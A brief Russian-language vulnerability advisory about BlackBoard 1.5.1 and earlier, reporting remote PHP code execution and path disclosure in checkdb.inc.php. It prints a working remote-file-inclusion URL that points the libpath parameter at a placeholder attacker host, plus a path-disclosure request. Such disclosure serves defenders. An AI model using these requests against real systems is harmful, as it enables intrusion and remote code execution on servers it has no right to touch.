Программа: BlackBoard 1.5.1 и более ранние версии 

Удаленный пользователь может выполнить произвольные команды на целевой системе. 

1. Выполнение произвольного PHP кода: 

http://[target]/bb_lib/checkdb .inc.php?libpath=http://[attacker]/

2. Раскрытие пути: 

http://[target]/bb_lib/checkdb.inc.php

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии